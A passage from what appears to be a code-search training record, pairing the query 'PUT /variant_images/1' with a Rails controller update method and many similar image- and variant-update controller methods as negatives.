"0.5735954",
"0.5734562",
"0.57338494",
"0.57330555",
"0.57311237",
"0.57278657",
"0.57076615",
"0.5702286",
"0.56971663",
"0.56900215",
"0.5685283",
"0.5683414",
"0.5682405",
"0.5682323",
"0.5677877",
"0.5677606",
"0.5674716",
"0.56687534",
"0.5662788",
"0.56627566",
"0.5660221",
"0.5658537",
"0.56575215",
"0.56575215",
"0.56575215",
"0.56575215",
"0.5657151",
"0.5647099",
"0.5647099",
"0.5647099",
"0.5647099",
"0.5647099",
"0.5641843",
"0.5641843",
"0.56403583",
"0.563696",
"0.5636904",
"0.5631242",
"0.5628726",
"0.56242573",
"0.56238914",
"0.56232697"
] | 0.72633463 | 0 |
PUT /variant_images/1 PUT /variant_images/1.json | def update
@variant_image = VariantImage.find(params[:id])
respond_to do |format|
if @variant_image.update_attributes(params[:variant_image])
format.html { redirect_to @variant_image, notice: 'Variant image was successfully updated.' }
format.json { head :ok }
else
format.html { render action: "edit" }
format.json { render json: @variant_image.errors, status: :unprocessable_entity }
end
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def create\n params[:variant_image][:image2] = params[:variant_image][:image] # For image replication across two s3 accounts\n @variant_image = VariantImage.new(params[:variant_image])\n\t\t@variant = @variant_image.variant\n @product = @variant.product \n\n respond_to do |format|\n if @variant_image.save\n format.html { redirect_to @variant, notice: 'Image added successfully.' }\n format.js { redirect_to @variant_image, notice: 'Image added successfully.' }\n format.json { render json: @variant_image, status: :created, location: @variant_image }\n else\n format.html { render action: \"new\" }\n format.js { render action: \"new\" }\n format.json { render json: @variant_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n #we can allow updating an image name and description and unit, but not the image data. for that we need to create a new image\n update_params = image_params\n update_params.delete(\"image\")\n\n if @image.update(update_params)\n head :no_content\n else\n render json: @image.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def update\n respond_to do |format|\n if @spot.update(spot_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @spot.photos.create!(:image => a, :imageable_id => @spot.id)\n end\n end\n\n format.html { redirect_to [ @country, @spot ] , notice: 'Spot was successfully updated.' }\n else\n format.html { render :edit }\n end\n end\n end",
"def update\n params[:image].delete :created_at\n params[:image].delete :updated_at\n params[:image].delete :id\n @image = Image.find(params[:id])\n if @image.update_attributes(params[:image])\n render json: @image\n else\n render json: @image.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @apartment.update(apartment_params)\n if params[:images]\n # The magic is here ;)\n params[:images].each { |image|\n if (image!=nil)\n @apartment.pictures.create(image: image)\n \n end\n }\n end\n format.html { redirect_to @apartment, notice: 'La propiedad se actualizo correctamente.' }\n format.json { render :show, status: :ok, location: @apartment }\n else\n format.html { render :edit }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @product_image.update_attributes(product_image_params)\n render json: @product_image, status: 200\n else\n render_error 400, @product_image.errors.full_messages\n end\n end",
"def update\n\n params = image_params\n params[\"tags\"] = params[\"tags\"].delete_suffix(',')\n\n respond_to do |format|\n if @image.update(params)\n format.html { redirect_to @image, notice: \"Image was successfully updated.\" }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @smartphone.update(smartphone_params)\n if params[:images]\n params[:images].each do |val|\n temp = @smartphone.pictures.find_by(image_file_name: val.original_filename)\n if temp\n temp.update_attributes(:image => val)\n else\n @smartphone.pictures.create(image: val)\n end\n end\n end\n format.html { redirect_to @smartphone, notice: 'Smartphone was successfully updated.' }\n format.json { render :show, status: :ok, location: @smartphone }\n else\n format.html { render :edit }\n format.json { render json: @smartphone.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n new_images = params[:images]||[]\n\n @intention = Intention.find_by_uuid(params[:id])\n @intention.image_urls = IntentionsHelper.strip_duplicate_images(new_images)\n @intention.save\n\n points = VISBD_INTENTION_IMAGE_POINTS*new_images.count\n track_event(current_action_item(Intention::COMPONENT_TYPE)||current_enrollment, Intention::VISUALIZED_EVENT, target:@intention, points:points)\n\n render nothing: true\n end",
"def update\n respond_to do |format|\n if @icesled.update(icesled_params)\n if params[:images]\n @icesled.gallery ||= Gallery.new\n params[:images].each do |image|\n @icesled.gallery.images.create(image: image)\n end\n unless @icesled.image_file_size\n @icesled.update(image: @icesled.gallery.images.first.image)\n end\n end\n format.html { redirect_to @icesled, notice: 'Icesled was successfully updated.' }\n format.json { render :show, status: :ok, location: @icesled }\n else\n format.html { render :edit }\n format.json { render json: @icesled.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n type = @image.url_type\n if @image.update_attributes!(params[:image])\n if request.xhr?\n render :text => [ @image.to_jq_upload(type, \"image\") ].to_json.to_s\n else\n redirect_to console_images_path\n end\n else \n if request.xhr?\n render :text => [ @image.to_jq_upload(type, \"image\").merge({ :error => \"custom_failure\" }) ].to_json.to_s\n else\n redirect_to edit_console_image_path(@image)\n end\n end\n end",
"def variant\n shop = params[:shop]\n product_id = params[:id]\n variant_id = params[:variant_id]\n image_url = params[:url]\n\n begin\n url = \"http://variantimages.shopifyapps.com/jquery-preload.js?shop=#{shop}&id=#{product_id}\"\n content = open(url).read\n\n if match = content.match(/variantData = ([^;]+);/)\n variant_url = URI(image_url)\n variant_url.path = variant_path([\n File.dirname(variant_url.path),\n JSON.parse(match[1])[variant_id][\"filename\"].split('.').first,\n File.basename(variant_url.path).split('_').last,\n ])\n image_url = variant_url.to_s\n end\n rescue => e\n end\n\n redirect_to image_url\n end",
"def update\n respond_to do |format|\n if @rent.update(rent_params)\n\n if params[:image]\n puts params[:image]\n params[:image].each { |image|\n @rent.rent_images.create(rent_id: @rent.id, image:image)\n }\n \n end\n \n format.html { redirect_to @rent, notice: 'Rent was successfully updated.' }\n format.json { render :show, status: :ok, location: @rent }\n else\n format.html { render :edit }\n format.json { render json: @rent.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = ServiceImage.find(params[:id])\n respond_to do |format|\n if @image.update(car_image_params)\n flash[:success] = \"Car Image was successfully updated.\"\n format.html { redirect_to admin_car_car_images_path(@image.car) }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image.update(image_params)\n redirect_to '/images'\n end",
"def update\n @image = Image.find(params[:id])\n checkaccountobject(\"images\",@image)\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @apartment.update(apartment_params)\n if params[:photos]\n params[:photos]['image'].each do |a|\n @photo = @apartment.photos.create!(:image => a, :apartment_id => @apartment.id)\n end\n end\n format.html { redirect_to @apartment, notice: 'Apartment was successfully updated.' }\n format.json { render :show, status: :ok, location: @apartment }\n else\n format.html { render :edit }\n format.json { render json: @apartment.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @album = Album.find(params[:id])\n \n respond_to do |format|\n if @album.update_attributes(params[:album])\n @album.images.clear\n @album.images << Image.find([params[:images]].flatten)\n @album.save!\n format.html { redirect_to(albums_path, :notice => 'Album was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @album.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @estate_agent_image = EstateAgentsImage.find(params[:id])\n\n respond_to do |format|\n if @estate_agent_image.update_attributes(params[:property_image])\n format.html { redirect_to @estate_agent_image, notice: 'Property image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @estate_agent_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @item.update(item_params)\n @item.images.delete_all\n unless params.require(:item)[:images_id].nil?\n params.require(:item)[:images_id].each do |id|\n image = Image.find_by_id(id)\n (@item.images << image) unless image.nil?\n end\n end\n format.html { redirect_to @item, notice: 'Item was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def song_save_image\r\n\r\n\t\t@song = Song.find(params[:song_id])\r\n\t\t@artist = Artist.find_by_url_slug(params[:url_slug])\r\n\r\n\t\t@song.image = \"https://\"+IMAGE_BUCKET+\".s3.amazonaws.com/Three_Repeater-\"+@artist.url_slug+\"-\"+@song.id.to_s+\"-\"+params[:file_name]\r\n\r\n\t\t@song.update_column(:image,@song.image)\r\n\r\n\t\tlogger.info(\"song image= \"+@song.image.to_s)\r\n\r\n\t\trespond_to do |f|\r\n\r\n\t\t\tf.json {\r\n\t\t\t\trender :json => {\r\n\t\t\t\t\t\t:success => true}\r\n\t\t\t}\r\n\r\n\t\tend\r\n\r\n\tend",
"def index\n @variant_images = VariantImage.all\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @variant_images }\n end\n end",
"def destroy\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n @variant_image.destroy\n\n respond_to do |format|\n format.html { redirect_to @variant.product }\n format.json { head :ok }\n end\n end",
"def update\n @food.build_image(params['image']) do |t|\n if params['food']['image']['data']\n t.data = Base64.encode64(params['food']['image']['data'].read)\n t.filename = params['food']['image']['data'].original_filename\n t.mime_type = params['food']['image']['data'].content_type\n end\n end \n @food.name = @food.name.capitalize\n respond_to do |format|\n if @food.update(food_params)\n format.html { redirect_to @food, notice: 'Food was successfully updated.' }\n format.json { render :show, status: :ok, location: @food }\n else\n format.html { render :edit }\n format.json { render json: @food.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @taxi_image.update(taxi_image_params)\n format.html { redirect_to @taxi_image, notice: 'Taxi image was successfully updated.' }\n format.json { render :show, status: :ok, location: @taxi_image }\n else\n format.html { render :edit }\n format.json { render json: @taxi_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @s3_image = S3Image.find(params[:id])\n\n respond_to do |format|\n if @s3_image.update_attributes(params[:s3_image])\n format.html { redirect_to @s3_image, notice: 'S3 image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @s3_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @vehicle_type.update(vehicle_type_params)\n images\n\n format.html { redirect_to @vehicle_type, notice: 'Vehicle type was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @vehicle_type.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @variant_image = VariantImage.new\n @variant = Variant.find(params[:variant_id])\n @variant_image.variant_id = @variant.id\n @product = @variant.product\n\n respond_to do |format|\n format.html # new.html.erb\n format.js # new.js.erb\n format.json { render json: @variant_image }\n end\n end",
"def update\n respond_to do |format|\n if @variant.update(variant_params)\n format.html { redirect_to edit_admin_good_url(@variant.good, anchor: \"variants\"), notice: 'Variant was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def show\n @variant_image = VariantImage.find(params[:id])\n @variant = @variant_image.variant\n\n respond_to do |format|\n format.html # show.html.erb\n format.js\n format.json { render json: @variant_image }\n end\n end",
"def update\n respond_to do |format|\n if @image_to_sample.update(image_to_sample_params)\n format.html { redirect_to @image_to_sample, notice: 'Image to sample was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image_to_sample.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n parms = ski_params\n parms[:color] = parms[:color].split(', ') if parms[:color]\n respond_to do |format|\n if @ski.update(parms)\n if params[:images]\n @ski.gallery ||= Gallery.new\n params[:images].each do |image|\n @ski.gallery.images.create(image: image)\n end\n unless @ski.image_file_size\n @ski.update(image: @ski.gallery.images.first.image)\n end\n end\n format.html { redirect_to @ski, notice: 'Ski was successfully updated.' }\n format.json { render :show, status: :ok, location: @ski }\n else\n format.html { render :edit }\n format.json { render json: @ski.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @car.update(car_params)\n unless params[:photos].blank?\n params[:photos]['image'].each do |p|\n @photo = @car.photos.create!(:image => p, :car_id => @car.id)\n end\n end\n format.html { redirect_to @car, notice: 'Car was successfully updated.' }\n format.json { render :show, status: :ok, location: @car }\n else\n format.html { render :edit }\n format.json { render json: @car.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = @album.images.find(params[:id])\n @image.update(image_params)\n redirect_to album_path(@image.album.id)\n end",
"def update\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n if @variant.update_attributes(params[:variant])\n format.html { redirect_to admin_product_variants_path(@variant.master_id),\n notice: 'Variant was successfully updated.' }\n format.json { head :no_content }\n else\n @path = admin_product_variant_path(@variant.master_id, @variant)\n format.html { render action: \"edit\" }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @sub_collection.update(sub_collection_params)\n if not sub_collection_images_params[:sub_collection_images_attributes].nil?\n sub_collection_images_params[:sub_collection_images_attributes].each do |sci|\n @sub_collection.sub_collection_images.create(sub_collection_image: sci[:sub_collection_image])\n end\n end\n format.html { redirect_to @sub_collection, notice: 'Sub collection was successfully updated.' }\n format.json { render :show, status: :ok, location: @sub_collection }\n else\n @sub_collection.sub_collection_images.build\n format.html { render :edit }\n format.json { render json: @sub_collection.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @family_image = FamilyImage.find(params[:id])\n\n if @family_image.update(family_image_params)\n head :no_content\n else\n render json: @family_image.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @img.update(img_params)\n format.html { redirect_to @img, notice: \"Img was successfully updated.\" }\n format.json { render :show, status: :ok, location: @img }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @img.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to '/galleries/' + params[:galery_id].to_s, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @animal_image.update(animal_image_params)\n format.html { redirect_to @animal_image, notice: \"Animal image was successfully updated.\" }\n format.json { render :show, status: :ok, location: @animal_image }\n else\n format.html { render :edit }\n format.json { render json: @animal_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @event.update(event_params)\n if params[:images]\n params[:images].each { |image|\n @event.images.create(image: image)\n }\n end\n if params[:selected]\n params[:selected].each { |selecte|\n @event.images.destroy(selecte)\n }\n end \n format.html { redirect_to @event, notice: 'Evento actualizado correctamente.' }\n format.json { render :show, status: :ok, location: @event }\n else\n format.html { render :edit }\n format.json { render json: @event.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @s3image.update(s3image_params)\n format.html { redirect_to @s3image, notice: 'S3image was successfully updated.' }\n format.json { render :show, status: :ok, location: @s3image }\n else\n format.html { render :edit }\n format.json { render json: @s3image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if image.update(image_params)\n format.html { redirect_to image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: image }\n else\n format.html { render :edit }\n format.json { render json: image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @place.update(place_params)\n if params[:images]\n params[:images].each do |image|\n @place.photos.create(image: image)\n end\n end\n format.html do\n redirect_to @place, notice: 'Place was successfully updated.'\n end\n format.json { render :show, status: :ok, location: @place }\n else\n format.html { render :edit }\n format.json { render json: @place.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_image\n # wish image can be updated only when then wish belongs to current user\n if @wish.user_id == current_user.id\n @wish.image.purge\n @wish.image.attach(wish_params[:image])\n render json: url_for(@wish.image)\n end\n end",
"def update\n if params[:sequence][:image]\n create_image\n render json: @sequence, status: :ok and return\n end\n respond_to do |format|\n if @sequence.update(sequence_params)\n format.html { redirect_to @sequence, notice: 'Sequence was successfully updated.' }\n format.json { render :show, status: :ok, location: @sequence }\n else\n format.html { render :edit }\n format.json { render json: @sequence.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n \n if @animal.update(animal_params)\n if params[:images]\n params[:images].each { |image|\n @animal.images.create(image: image)\n }\n end\n if params[:selected]\n params[:selected].each { |selecte|\n @animal.images.destroy(selecte)\n }\n end\n if animal_params[:solved]\n format.html { redirect_to @animal}\n else\n format.html { redirect_to @animal, notice: 'Publicación actualizada correctamente.' }\n end\n format.json { render :show, status: :ok, location: @animal }\n else\n format.html { render :edit }\n format.json { render json: @animal.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n format.html { redirect_to @image, :notice => 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render :action => \"edit\" }\n format.json { render :json => @image.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @recipe_image.update(recipe_image_params)\n format.html { redirect_to @recipe_image, notice: 'Recipe image was successfully updated.' }\n format.json { render :show, status: :ok, location: @recipe_image }\n else\n format.html { render :edit }\n format.json { render json: @recipe_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @cafe, notice: 'image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def upload_image(row, h2i, product_id, row_index)\n url = get_val row, 'images', h2i\n return nil unless url\n res = sphere.post_image product_images_url(@sphere_project_key, product_id), url\n raise \"[row #{row_index}] Problems on image upload: '#{url}' - server returned with code '#{res.code}':\\n #{res.body}\" if res == nil or res.code != \"200\"\n j = parse_JSON res.body\n j['version'] # The method returns the latest version of the product.\n end",
"def update\n respond_to do |format|\n if @image_tag.update(image_tag_params)\n format.html { redirect_to @image_tag, notice: 'Image tag was successfully updated.' }\n format.json { render :show, status: :ok, location: @image_tag }\n else\n format.html { render :edit }\n format.json { render json: @image_tag.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { render :show, status: :ok, location: @image }\n else\n format.html { render :edit }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @vmimage.update(vmimage_params)\n format.html { redirect_to @vmimage, notice: 'Vmimage was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @vmimage.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @image = Image.find(params[:id])\n\n respond_to do |format|\n if @image.update_attributes(params[:image])\n b = Bubo.from_heroku\n b.remove_image(@image.id.to_s)\n b.add_image(@image.id.to_s, @image.url)\n \n format.html { redirect_to(@image, :notice => 'Image was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @image.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @variant.update(variant_params)\n format.html { redirect_to admin_product_variants_url(@product), notice: 'Variant was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @property_image = PropertyImage.find(params[:id])\n\n respond_to do |format|\n if @property_image.update_attributes(params[:property_image])\n format.html { redirect_to property_images_path, notice: 'Property image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @property_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @showcase = Showcase.find(params[:showcase_id])\n @showcase_image = ShowcaseImage.find(params[:id])\n\n if @showcase_image.update_attributes(params[:showcase_image])\n redirect_to edit_showcase_url(@showcase)\n else\n render :action => \"edit\"\n end\n end",
"def update\n @pictures = Picture.all.order(created_at: :desc)\n @picture.update(picture_params)\n render json: @pictures\n # head :no_content\n end",
"def update\n @slider_image = SliderImage.find(params[:id])\n\n respond_to do |format|\n if @slider_image.update_attributes(params[:slider_image])\n format.html { redirect_to slider_images_path, notice: 'Slider image was successfully updated.' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @slider_image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @variant = Variant.find(params[:id])\n\n respond_to do |format|\n if @variant.update_attributes(params[:variant])\n format.html { redirect_to event_path(@variant.event), notice: 'Ticket type was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @variant.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @raw_image.update(raw_image_params)\n redirect_to admin_raw_images_path\n\n end",
"def update\n par = img_properties\n logger.info(\"parameters: #{par.inspect}\")\n valid = true\n\n # find by user associated to app key, not by user from request parameter!\n @image = Image.editable_by(@user).find_by_guid(params[:id])\n\n return not_found if !@image\n\n # set these variables back to nil if they were in the request but blank\n if par[:ref]\n @image.ref = par[:ref].blank? ? nil : par[:ref]\n end\n if par[:name]\n @image.name = par[:name].blank? ? nil : par[:name]\n end\n if par[:page_url]\n @image.page_url = par[:page_url].blank? ? nil : par[:page_url]\n end\n @image.private = par[:private] if par[:private]\n\n # update calibration data if specified\n if !par[:calibrate_length].blank?\n @image.calibrate_length = par[:calibrate_length].to_f\n @image.calibrate_unit = par[:calibrate_unit].to_i if !par[:calibrate_unit].blank?\n @image.calibrate_coords = par[:calibrate_coords] if !par[:calibrate_coords].blank?\n @image.ppi = calculate_ppi(@image)\n end\n\n orig_url = par[:original_url] || par[:url]\n begin\n # this may fail\n if !orig_url.blank? && orig_url != @image.original_url\n # url was updated\n @image.remote_upload_url = orig_url\n @image.original_url = orig_url\n end\n rescue CarrierWave::DownloadError\n @image.errors.add(:remote_upload_url, \"^This url doesn't appear to be valid\")\n valid = false\n rescue CarrierWave::IntegrityError\n @image.errors.add(:remote_upload_url, \"^This url does not appear to point to a valid image\")\n valid = false\n rescue StandardError\n @image.errors.add(:remote_upload_url, \"There does not appear to be an image at this url\")\n valid = false\n end\n\n if valid && @image.save\n # update product if set\n @image.user_product = par[:product] if par[:product]\n\n image_data = @image.js_serialize\n # if the user hit the 'save and next' button, include the guid of the next image in the response.\n # The client side will redirect to the edit page for that image. \n if params[:commit] == 'save and next'\n image = Image.find_most_recent_uncalibrated(current_user.id)\n image_data['nextImage'] = image.guid if image\n end\n render :json => image_data, :callback => params[:callback]\n else\n render :json => { :error => 403, :messages => prepare_errors(@image), :callback => params[:callback] }, :status => 200\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html { redirect_to @image, notice: 'Image was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @image.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @sample_photo.update(sample_photo_params)\n render json: @sample_photo, status: :ok\n else\n render json: @sample_photo.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @image.update(image_params)\n format.html {redirect_to @image, notice: 'Image was successfully updated.'}\n format.json {render :show, status: :ok, location: @image}\n else\n format.html {render :edit}\n format.json {render json: @image.errors, status: :unprocessable_entity}\n end\n end\n end",
